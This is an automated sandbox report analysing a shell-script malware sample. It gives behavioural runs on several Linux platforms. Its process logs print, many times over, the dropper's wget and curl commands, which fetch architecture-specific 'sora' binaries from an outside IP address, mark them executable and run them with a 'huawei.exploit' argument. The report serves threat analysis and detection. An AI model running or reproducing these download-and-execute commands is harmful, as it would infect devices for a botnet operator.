Malware Analysis Report

2025-06-15 23:10

Sample ID 241018-c3kylasame
Target bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh
SHA256 bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300
Tags
defense_evasion discovery antivm
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300

Threat Level: Shows suspicious behavior

The file bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh was found to be: Shows suspicious behavior.

Malicious Activity Summary

defense_evasion discovery antivm

File and Directory Permissions Modification

Executes dropped EXE

Checks CPU configuration

Reads runtime system information

System Network Configuration Discovery

Writes file to tmp directory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-18 02:36

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-18 02:36

Reported

2024-10-18 02:38

Platform

ubuntu1804-amd64-20240508-en

Max time kernel

5s

Max time network

128s

Command Line

[/tmp/bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/cat N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/robben /tmp/bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh N/A

Processes

/tmp/bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh

[/tmp/bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.x86]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.x86]

/bin/cat

[cat sora.x86]

/bin/chmod

[chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh config-err-qFPeaa netplan_tp4c7aih robben snap-private-tmp ssh-L7Ck4WeeJZaz systemd-private-151007155936412ba5cb80e5bfa5ecbd-bolt.service-nEA2jS systemd-private-151007155936412ba5cb80e5bfa5ecbd-colord.service-jOXWU1 systemd-private-151007155936412ba5cb80e5bfa5ecbd-ModemManager.service-78CYR9 systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-resolved.service-lPstul systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-timedated.service-L7M5MD]

/tmp/robben

[./robben huawei.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.mips]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.mips]

/bin/cat

[cat sora.mips]

/bin/chmod

[chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh config-err-qFPeaa netplan_tp4c7aih robben snap-private-tmp ssh-L7Ck4WeeJZaz systemd-private-151007155936412ba5cb80e5bfa5ecbd-bolt.service-nEA2jS systemd-private-151007155936412ba5cb80e5bfa5ecbd-colord.service-jOXWU1 systemd-private-151007155936412ba5cb80e5bfa5ecbd-ModemManager.service-78CYR9 systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-resolved.service-lPstul systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-timedated.service-L7M5MD]

/tmp/robben

[./robben huawei.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.x86_64]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.x86_64]

/bin/cat

[cat sora.x86_64]

/bin/chmod

[chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh config-err-qFPeaa netplan_tp4c7aih robben snap-private-tmp ssh-L7Ck4WeeJZaz systemd-private-151007155936412ba5cb80e5bfa5ecbd-bolt.service-nEA2jS systemd-private-151007155936412ba5cb80e5bfa5ecbd-colord.service-jOXWU1 systemd-private-151007155936412ba5cb80e5bfa5ecbd-ModemManager.service-78CYR9 systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-resolved.service-lPstul systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-timedated.service-L7M5MD]

/tmp/robben

[./robben huawei.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.i468]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.i468]

/bin/cat

[cat sora.i468]

/bin/chmod

[chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh config-err-qFPeaa netplan_tp4c7aih robben snap-private-tmp ssh-L7Ck4WeeJZaz systemd-private-151007155936412ba5cb80e5bfa5ecbd-bolt.service-nEA2jS systemd-private-151007155936412ba5cb80e5bfa5ecbd-colord.service-jOXWU1 systemd-private-151007155936412ba5cb80e5bfa5ecbd-ModemManager.service-78CYR9 systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-resolved.service-lPstul systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-timedated.service-L7M5MD]

/tmp/robben

[./robben huawei.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.i686]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.i686]

/bin/cat

[cat sora.i686]

/bin/chmod

[chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh config-err-qFPeaa netplan_tp4c7aih robben snap-private-tmp ssh-L7Ck4WeeJZaz systemd-private-151007155936412ba5cb80e5bfa5ecbd-bolt.service-nEA2jS systemd-private-151007155936412ba5cb80e5bfa5ecbd-colord.service-jOXWU1 systemd-private-151007155936412ba5cb80e5bfa5ecbd-ModemManager.service-78CYR9 systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-resolved.service-lPstul systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-timedated.service-L7M5MD]

/tmp/robben

[./robben huawei.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.mpsl]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.mpsl]

/bin/cat

[cat sora.mpsl]

/bin/chmod

[chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh config-err-qFPeaa netplan_tp4c7aih robben snap-private-tmp ssh-L7Ck4WeeJZaz systemd-private-151007155936412ba5cb80e5bfa5ecbd-bolt.service-nEA2jS systemd-private-151007155936412ba5cb80e5bfa5ecbd-colord.service-jOXWU1 systemd-private-151007155936412ba5cb80e5bfa5ecbd-ModemManager.service-78CYR9 systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-resolved.service-lPstul systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-timedated.service-L7M5MD]

/tmp/robben

[./robben huawei.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.arm4]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.arm4]

/bin/cat

[cat sora.arm4]

/bin/chmod

[chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh config-err-qFPeaa netplan_tp4c7aih robben snap-private-tmp ssh-L7Ck4WeeJZaz systemd-private-151007155936412ba5cb80e5bfa5ecbd-bolt.service-nEA2jS systemd-private-151007155936412ba5cb80e5bfa5ecbd-colord.service-jOXWU1 systemd-private-151007155936412ba5cb80e5bfa5ecbd-ModemManager.service-78CYR9 systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-resolved.service-lPstul systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-timedated.service-L7M5MD]

/tmp/robben

[./robben huawei.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.arm5]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.arm5]

/bin/cat

[cat sora.arm5]

/bin/chmod

[chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh config-err-qFPeaa netplan_tp4c7aih robben snap-private-tmp ssh-L7Ck4WeeJZaz systemd-private-151007155936412ba5cb80e5bfa5ecbd-bolt.service-nEA2jS systemd-private-151007155936412ba5cb80e5bfa5ecbd-colord.service-jOXWU1 systemd-private-151007155936412ba5cb80e5bfa5ecbd-ModemManager.service-78CYR9 systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-resolved.service-lPstul systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-timedated.service-L7M5MD]

/tmp/robben

[./robben huawei.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.arm6]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.arm6]

/bin/cat

[cat sora.arm6]

/bin/chmod

[chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh config-err-qFPeaa netplan_tp4c7aih robben snap-private-tmp ssh-L7Ck4WeeJZaz systemd-private-151007155936412ba5cb80e5bfa5ecbd-bolt.service-nEA2jS systemd-private-151007155936412ba5cb80e5bfa5ecbd-colord.service-jOXWU1 systemd-private-151007155936412ba5cb80e5bfa5ecbd-ModemManager.service-78CYR9 systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-resolved.service-lPstul systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-timedated.service-L7M5MD]

/tmp/robben

[./robben huawei.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.arm7]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.arm7]

/bin/cat

[cat sora.arm7]

/bin/chmod

[chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh config-err-qFPeaa netplan_tp4c7aih robben snap-private-tmp ssh-L7Ck4WeeJZaz systemd-private-151007155936412ba5cb80e5bfa5ecbd-bolt.service-nEA2jS systemd-private-151007155936412ba5cb80e5bfa5ecbd-colord.service-jOXWU1 systemd-private-151007155936412ba5cb80e5bfa5ecbd-ModemManager.service-78CYR9 systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-resolved.service-lPstul systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-timedated.service-L7M5MD]

/tmp/robben

[./robben huawei.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.ppc]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.ppc]

/bin/cat

[cat sora.ppc]

/bin/chmod

[chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh config-err-qFPeaa netplan_tp4c7aih robben snap-private-tmp ssh-L7Ck4WeeJZaz systemd-private-151007155936412ba5cb80e5bfa5ecbd-bolt.service-nEA2jS systemd-private-151007155936412ba5cb80e5bfa5ecbd-colord.service-jOXWU1 systemd-private-151007155936412ba5cb80e5bfa5ecbd-ModemManager.service-78CYR9 systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-resolved.service-lPstul systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-timedated.service-L7M5MD]

/tmp/robben

[./robben huawei.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.ppc440fp]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.ppc440fp]

/bin/cat

[cat sora.ppc440fp]

/bin/chmod

[chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh config-err-qFPeaa netplan_tp4c7aih robben snap-private-tmp ssh-L7Ck4WeeJZaz systemd-private-151007155936412ba5cb80e5bfa5ecbd-bolt.service-nEA2jS systemd-private-151007155936412ba5cb80e5bfa5ecbd-colord.service-jOXWU1 systemd-private-151007155936412ba5cb80e5bfa5ecbd-ModemManager.service-78CYR9 systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-resolved.service-lPstul systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-timedated.service-L7M5MD]

/tmp/robben

[./robben huawei.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.m68k]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.m68k]

/bin/cat

[cat sora.m68k]

/bin/chmod

[chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh config-err-qFPeaa netplan_tp4c7aih robben snap-private-tmp ssh-L7Ck4WeeJZaz systemd-private-151007155936412ba5cb80e5bfa5ecbd-bolt.service-nEA2jS systemd-private-151007155936412ba5cb80e5bfa5ecbd-colord.service-jOXWU1 systemd-private-151007155936412ba5cb80e5bfa5ecbd-ModemManager.service-78CYR9 systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-resolved.service-lPstul systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-timedated.service-L7M5MD]

/tmp/robben

[./robben huawei.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.sh4]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.sh4]

/bin/cat

[cat sora.sh4]

/bin/chmod

[chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh config-err-qFPeaa netplan_tp4c7aih robben snap-private-tmp ssh-L7Ck4WeeJZaz systemd-private-151007155936412ba5cb80e5bfa5ecbd-bolt.service-nEA2jS systemd-private-151007155936412ba5cb80e5bfa5ecbd-colord.service-jOXWU1 systemd-private-151007155936412ba5cb80e5bfa5ecbd-ModemManager.service-78CYR9 systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-resolved.service-lPstul systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-timedated.service-L7M5MD]

/tmp/robben

[./robben huawei.exploit]

Network

Country Destination Domain Proto
NL 93.123.85.141:80 tcp
N/A 224.0.0.251:5353 udp
NL 93.123.85.141:80 tcp
GB 185.125.188.61:443 tcp
GB 185.125.188.62:443 tcp
US 151.101.1.91:443 tcp
US 151.101.1.91:443 tcp
GB 195.181.164.14:443 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-18 02:36

Reported

2024-10-18 02:38

Platform

debian9-armhf-20240418-en

Max time kernel

12s

Max time network

13s

Command Line

[/tmp/bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/cat N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/robben /tmp/bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh N/A

Processes

/tmp/bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh

[/tmp/bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.x86]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.x86]

/bin/cat

[cat sora.x86]

/bin/chmod

[chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh robben systemd-private-6aaa57480b2c430fa38db9d8e082a72f-systemd-timedated.service-pKCtoQ]

/tmp/robben

[./robben huawei.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.mips]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.mips]

/bin/cat

[cat sora.mips]

/bin/chmod

[chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh robben systemd-private-6aaa57480b2c430fa38db9d8e082a72f-systemd-timedated.service-pKCtoQ]

/tmp/robben

[./robben huawei.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.x86_64]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.x86_64]

/bin/cat

[cat sora.x86_64]

/bin/chmod

[chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh robben systemd-private-6aaa57480b2c430fa38db9d8e082a72f-systemd-timedated.service-pKCtoQ]

/tmp/robben

[./robben huawei.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.i468]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.i468]

/bin/cat

[cat sora.i468]

/bin/chmod

[chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh robben systemd-private-6aaa57480b2c430fa38db9d8e082a72f-systemd-timedated.service-pKCtoQ]

/tmp/robben

[./robben huawei.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.i686]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.i686]

/bin/cat

[cat sora.i686]

/bin/chmod

[chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh robben systemd-private-6aaa57480b2c430fa38db9d8e082a72f-systemd-timedated.service-pKCtoQ]

/tmp/robben

[./robben huawei.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.mpsl]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.mpsl]

/bin/cat

[cat sora.mpsl]

/bin/chmod

[chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh robben systemd-private-6aaa57480b2c430fa38db9d8e082a72f-systemd-timedated.service-pKCtoQ]

/tmp/robben

[./robben huawei.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.arm4]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.arm4]

/bin/cat

[cat sora.arm4]

/bin/chmod

[chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh robben systemd-private-6aaa57480b2c430fa38db9d8e082a72f-systemd-timedated.service-pKCtoQ]

/tmp/robben

[./robben huawei.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.arm5]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.arm5]

/bin/cat

[cat sora.arm5]

/bin/chmod

[chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh robben systemd-private-6aaa57480b2c430fa38db9d8e082a72f-systemd-timedated.service-pKCtoQ]

/tmp/robben

[./robben huawei.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.arm6]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.arm6]

/bin/cat

[cat sora.arm6]

/bin/chmod

[chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh robben systemd-private-6aaa57480b2c430fa38db9d8e082a72f-systemd-timedated.service-pKCtoQ]

/tmp/robben

[./robben huawei.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.arm7]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.arm7]

/bin/cat

[cat sora.arm7]

/bin/chmod

[chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh robben systemd-private-6aaa57480b2c430fa38db9d8e082a72f-systemd-timedated.service-pKCtoQ]

/tmp/robben

[./robben huawei.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.ppc]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.ppc]

/bin/cat

[cat sora.ppc]

/bin/chmod

[chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh robben systemd-private-6aaa57480b2c430fa38db9d8e082a72f-systemd-timedated.service-pKCtoQ]

/tmp/robben

[./robben huawei.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.ppc440fp]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.ppc440fp]

/bin/cat

[cat sora.ppc440fp]

/bin/chmod

[chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh robben systemd-private-6aaa57480b2c430fa38db9d8e082a72f-systemd-timedated.service-pKCtoQ]

/tmp/robben

[./robben huawei.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.m68k]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.m68k]

/bin/cat

[cat sora.m68k]

/bin/chmod

[chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh robben systemd-private-6aaa57480b2c430fa38db9d8e082a72f-systemd-timedated.service-pKCtoQ]

/tmp/robben

[./robben huawei.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.sh4]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.sh4]

/bin/cat

[cat sora.sh4]

/bin/chmod

[chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh robben systemd-private-6aaa57480b2c430fa38db9d8e082a72f-systemd-timedated.service-pKCtoQ]

/tmp/robben

[./robben huawei.exploit]

Network

Country Destination Domain Proto
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp

Files

memory/835-1-0xb6768000-0xb6779044-memory.dmp

memory/836-2-0xb6763000-0xb6774044-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-10-18 02:36

Reported

2024-10-18 02:38

Platform

debian9-mipsbe-20240611-en

Max time kernel

84s

Max time network

88s

Command Line

[/tmp/bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
